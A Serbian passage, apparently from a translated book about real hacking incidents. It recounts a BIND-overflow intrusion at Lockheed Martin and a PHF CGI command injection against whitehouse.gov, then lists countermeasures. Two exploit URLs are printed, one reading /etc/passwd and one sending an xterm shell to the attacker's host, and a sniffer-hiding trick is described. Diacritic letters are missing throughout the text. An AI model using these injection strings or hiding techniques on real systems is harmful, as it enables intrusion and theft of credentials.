ne0h nam je dao detae o nainu na koji je upao u raunarski sistem Lockheed Martina. Pria je svedoanstvo o inovativnosti hakera (Ako u bezbednosti postoji rupa, mi emo je pronai mogao bi biti hakerski moto), ali i upozoree za svaku organizaciju. ne0h je brzo utvrdio da Lockheed Martin ima sopstveni server za prevoee imena domena (engl. Domain Name Servers, DNS). DNS je Internet protokol koji, na primer, www.disney.com prevodi u 198.187.189.55, adresu koja se moe koristiti za usmeravae paketa s porukama. ne0h je znao da je grupa za istraivae bezbednosti u Poskoj objavila ono to hakeri nazivaju exploit program koji je dizajniran tako da napadne jedan konkretan raiv deo da iskoristi slabost u verziji DNS-a kompanije Lockheed. Kompanija je koristila DNS protokol pod imenom BIND (Berkeley Internet Name Domain). Poska grupa je otkrila da je jedna verzija BIND-a slaba kada napad ukuuje prelivae udaenog bafera (engl. remote buffer overflow), a upravo tu verziju imala je kompanija Lockheed Martin. Pratei metodu koju je pronaao na Internetu, ne0h je mogao da doe do administratorskih privilegija i na primarnom i na sekundarnom DNS serveru Lockheeda. Posle zauzimaa administratorskog naloga, ne0h je podesio presretae lozinki i e-pote instalirajui program za ukae. U tajnosti je hvatao sav saobraaj. Podatke koje treba uskladititi, haker obino ae na mesto gde je mala verovatnoa da e biti primeeni. Da bi sakrio dnevnik prislukivaa, ne0h je napravio direktorijum sa imenom koje je bilo samo razmak, predstaven s tri take. Prava putaa koja je koriena bila je /var/adm/ ... Tokom inspekcije administrator sistema mogao je lako da previdi ovu bezopasnu stavku.
48 Umee provale
Tehnika sakrivaa programa za ukae, mada je u mnogim situacijama efikasna, prilino je jednostavna. Za prikrivae hakerskih tragova u ovakvim situacijama postoje i prefienije metode. Pre nego to je otkrio da li e moi dube da prodre u mreu Lockheed Martina kako bi doao do poverivih informacija, ne0h je obratio pau na drugi zadatak, pa su osetive datoteke kompanije ostale bezbedne. Za upad u Belu kuu, Zyklon kae da je prvo pokrenuo program CGI Scanner koji pregleda cini sistem traei slabosti standardnog interfejsa za prenos. Otkrio je da je Web prezentacija podlona napadu pomou zloupotrebe PHF-a. Ona koristi greku koju je napravio programer PHF skripta (telefonskog imenika). PHF je okruee zasnovano na obrascima. Ono prihvata ime kao unos i na serveru trai podatke o imenu i adresi. Skript poziva funkciju escape_shell_cmd(), koja bi trebalo da oisti unos od sumivih znakova. Ali, programer je sa liste izostavio jedan znak znak za novi red. Vrstan napada mogao bi iskoristiti taj previd tako to e unos postaviti u obrazac koji sadri ifrovanu verziju (0x0a) znaka za novi red. Slae znakovnog niza sa ovim znakom prevarie skript tako da izvri svaku komandu koju napada odabere. Zyklon je u svoj ita Weba uneo URL
http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/bin/ cat%20/etc/passwd
Tako je mogao da prikae datoteku s lozinkama za whitehouse.gov. Meutim, on je hteo potpunu kontrolu nad Web serverom Bele kue. Gotovo sigurno je znao da e ulazi X Servera biti blokirani zatitnom barijerom, te da nee moi da se povee ni sa jednim od tih servisa na prezentaciji whitehouse.gov. Zato je ponovo iskoristio rupu u PHF-u tako to je uneo:
http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/usr/X11R6/ bin/xterm%20-ut%20-display%20zyklons.ip.address:0.0
Tako je terminalski emulator xterm poslat sa servera Bele kue na raunar koji je on kontrolisao i na kom je radio X server. Drugim reima, umesto da se povee sa whitehouse.gov, on je sistemu Bele kue naredio da se povee sa im. (To je mogue samo kada barijera dozvoava izlazne veze, to je ovde oigledno bio sluaj.)
Potom je iskoristio slabost prelivaa bafera u programu sistema ufsrestore. Zyklon kae da mu je to omoguilo da zadobije administratorska prava na prezentaciji whitehouse.gov, i pristup serveru za potu Bele kue i ostalim sistemima na mrei.
PROTIVMERE
Opisane zloupotrebe koje su pravili ne0h i Comrade pred sve kompanije postavaju dva problema. Prvi je jednostavan i opte poznat: informisae o svim najnovijim izdaima operativnog sistema i programa. Izuzetno je vano biti u toku i instalirati bezbednosne zakrpe ili ispravke. Da biste bili sigurni da se to ne radi nasumice, trebalo bi da osmislite i sprovodite program auriraa iji bi ci bio upozoravae odgovarajueg osoba im se pojavi nova dopuna proizvoda koje kompanija koristi naroito operativnog sistema, ali i aplikacionog softvera i firmvera. Kada nova zakrpa postane dostupna, ona se mora to pre instalirati odmah, ili im bude mogue. Nije teko razumeti premorene zaposlene koji su pod stalnim pritiskom obavaa obinih zadataka (instalirae sistema za nove radnike, na primer) i instaliraa zakrpa u dogledno vreme. Meutim, ukoliko je ureaj s nepotpunim softverom dostupan preko Interneta, nastaje veoma rizina situacija. Brojni sistemi su ugroeni zbog neredovnog auriraa. im se neka slabost objavi, prozor izloenosti je maksimalno otvoren sve dok proizvoa ne objavi zakrpu koja e popraviti problem, i dok je korisnici ne instaliraju. Vaa organizacija treba tom zadatku da d visok prioritet. Mora postojati zvanian program upravaa zakrpama koji smauje izloenost to je mogue bre, ali tako da se ne ometaju osnovne operacije poslovaa. Ipak, ak i ako redovno instalirate zakrpe, to nije dovono. ne0h kae da su neki upadi u kojima je uestvovao bili zloupotrebe nultog dana (engl. zero day) upadi zasnovani na slabosti koja je poznata samo u okviru male grupe hakera. Nulti dan je dan kada prvi put iskoriste tu slabost, a to je ujedno i dan kada proizvoa i udi koji se bave bezbednou saznaju za u.
50 Umee provale
Poto uvek postoji mogunost takvih upada, svaka organizacija koja koristi lo proizvod raiva je sve dok se ne objavi zakrpa ili zaobilazno reee. Kako da smaite rizik od takve izloenosti? Verujemo da je jedino vredno reee koriee modela dubinske odbrane. Moramo pretpostaviti da e nai raunarski sistemi koji su dostupni javnosti u nekom trenutku biti raivi na nulti dan. Zbog toga treba da stvorimo okruee za smaivae potencijalne tete koju loi momci mogu da naprave. Jedan primer, koji smo ranije pomenuli, jeste postavae javno dostupnih sistema u DMZ zatitne barijere kompanije. Termin DMZ je pozajmen iz vojnopolitike skraenice za demilitarizovanu zonu i odnosi se na podeavae arhitekture mree tako da sistemi koji su dostupni javnosti (Web serveri, serveri e-pote, DNS serveri i slino) budu izolovani od osetivih sistema u mrei kompanije. Primeivae arhitekture koja titi unutrau mreu jedan je primer dubinske odbrane. Takvim rasporedom, ak i ako hakeri otkriju dotad nepoznatu slabost i dospeju do Web servera ili servera e-pote, korporativni sistemi u unutraoj mrei i dae e biti zatieni dodatnim bezbednosnim slojem. Kompanije mogu organizovati jo jednu efikasnu protivmeru praeem mree ili pojedinanih matinih raunara u potrazi za neuobiajenim ili sumivim aktivnostima. Napada obino izvodi odreene akcije kada uspeno upadne u sistem na primer, pokuava da doe do ifrovanih ili obinih tekstualnih lozinki, instalira zada vrata, mea konfiguraciju datoteka kako bi oslabio bezbednost, ili mea sistemske, programske ili dnevnike datoteke. Praeem tih vrsta uobiajenog hakerskog ponaaa i uzbuivaem odgovarajueg osoba, lake ete kontrolisati tetu. Drugo: nebrojeno puta su me novinari pitali koji je najboi nain zatite poslovnog ili linog raunara u danaem neprijateskom okrueu. Jedna od osnovnih preporuka jeste koriee jaeg vida identifikovaa umesto statinih lozinki. Nikada neete znati, osim moda kada sve bude gotovo, da li neko drugi zna koja je vaa lozinka. Uz tradicionalne lozinke moete koristiti brojne tehnike prijavivaa na drugom nivou, koje omoguavaju mnogo veu sigurnost. Pored ranije pomenutog RSA SecureID-a, Safeword PremierAccess nudi etone za generisae lozinke, digitalne sertifikate, smart kartice, biometriku i druge tehnologije.
Nedostaci ove vrste kontrolisaa identiteta jesu dodatni trokovi i neprijatnosti za svakog korisnika. Sve zavisi od toga ta pokuavate da zatitite. Statine lozinke su moda dovone za zatitu novih lanaka Web prezentacije LA Timesa. Ali, da li se na ih moete osloniti kada treba da zatitite specifikacije dizajna novog putnikog mlaznog aviona?
ZAKLJUAK
Prie u ovoj kizi ali i novinski lanci, prikazuju koliko su ameriki raunarski sistemi, a i sama nacija, podloni napadu. ini se da je veoma malo sistema zaista bezbedno. U eri terorizma, jasno je da se rupe moraju boe krpiti. Epizode kao to je ova, pokreu pitae s kojim se moramo suoiti: koliko lako se talenat i znaje nesavesnih tinejdera mogu okrenuti protiv nas i ugroziti ameriko drutvo. Verujem da se jo u osnovnoj koli im se aci susretnu sa informatikom mora uiti o principima raunarske etike. Nedavno sam prisustvovao prezentaciji Frenka Abignejla, protagoniste filma Uhvati me ako moe (Catch Me If You Can). Frenk je sproveo istraivae o etikoj upotrebi raunara meu uenicima sredih kola irom zeme. Svaki uenik je bio upitan da li je provaivae lozinke kolskog druga prihvativo ponaae. Iznenauje da ak etrdeset osam procenata ispitanih studenata smatra da je to u redu. S takvim stavovima nije teko shvatiti zato udi uestvuju u ovakvim aktivnostima. Ukoliko neko ima predlog kako da mladi hakeri budu mae podloni regrutovau od strane neprijatea, domaih i stranih, bilo bi dobro da nam saopti svoje ideje.
NAPOMENE
1. Do Terrorists Troll the Net?, Niall McKay, wired.com, 14. novembar, 1998. 2. Makajev lanak, op. cit. 3. Makajev lanak, op. cit. 4. Sa Web prezentacije satp.org, South Asia Intelligence Review. 5. The United States and the Global Coalition Against Terrorism, SeptemberDecember 2001: A Chronology, http://www.state.gov/r/pa/ho/pubs/fs/ 5889.htm. 6. Obraae general-majora Yashwanta Devaa, Avsm (Retd), President lete, na temu Information Security u Indijskom meunarodnom centru (India International Centre), Nju Delhi, 6. april 2002, strana 9.
52 Umee provale
7. Ovo je teko potvrditi. Poto se napad dogodio za vreme Klintonove administracije, nijedna od navedenih osoba vie ne radi u Beloj kui. Ali dostupno je nekoliko sitnica. Monti Hejms je pravio video-snimak. Kristofer Adams je ime reportera britanskog asopisa Financial Times; koliko nam je poznato, u Beloj kui nije bilo zaposlenog s tim imenom. Debra Rid je fotograf Associated Pressa. Nismo pronali nikoga sa imenom Koni Kolabatisto ko je radio u Beloj kui. ena s tim imenom udata je (ili je bila u to vreme) za Dina Kolabatista, koji je bio predsednik odeea Solutions u kompaniji Space Imaging, ali nema oigledne veze izmeu ih i tima u Beloj kui. 8. http://www.attrition.org/mirror/attrition/1999/05/10/www.whitehouse.gov/mirror.html. 9. I ovde je teko proveriti verodostojnost. Ipak, tekst koji je naveden moe se videti na lokaciji http://www.attrition.org/mirror/attrition/1999/05/26/ mmic.snu.ac.kr/. 10. Computer Hackers Could Disable Military; System Compromised in Secret Exercise, Bil Gerc, Washington Times, 16. april, 1998. 11. Wars of the Future... Today, Tom Regan, Christian Science Monitor, 24. jun, 1999.

556 Umece Provale

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

556 Umece Provale

Uploaded by

Copyright:

Available Formats

Predgovor

3 Poglavlje 1: Hakerisanjem kazina do milion dolara

5 Poglavlje 1: Hakerisanjem kazina do milion dolara

Ponovno pisae koda

7 Poglavlje 1: Hakerisanjem kazina do milion dolara

9 Poglavlje 1: Hakerisanjem kazina do milion dolara

Povratak u kazina ovaj put radi igre

11 Poglavlje 1: Hakerisanjem kazina do milion dolara

13 Poglavlje 1: Hakerisanjem kazina do milion dolara

15 Poglavlje 1: Hakerisanjem kazina do milion dolara

ovek je rekao: elimo da vam poklonimo ou za kafu.

17 Poglavlje 1: Hakerisanjem kazina do milion dolara

19 Poglavlje 1: Hakerisanjem kazina do milion dolara

21 Poglavlje 1: Hakerisanjem kazina do milion dolara

23 Poglavlje 1: Hakerisanjem kazina do milion dolara

Terorista Kalid baca mamac

29 Poglavlje 2: Kad teroristi pozovu

31 Poglavlje 2: Kad teroristi pozovu

Veeraa meta: SIPRNET

33 Poglavlje 2: Kad teroristi pozovu

35 Poglavlje 2: Kad teroristi pozovu

37 Poglavlje 2: Kad teroristi pozovu

Organizacija Harkat ul-Mudahedin

Posledice 11. septembra

Upad u Belu kuu

39 Poglavlje 2: Kad teroristi pozovu

41 Poglavlje 2: Kad teroristi pozovu

43 Poglavlje 2: Kad teroristi pozovu

Pet godina kasnije

45 Poglavlje 2: Kad teroristi pozovu

Koliko je preta velika

49 Poglavlje 2: Kad teroristi pozovu

You might also like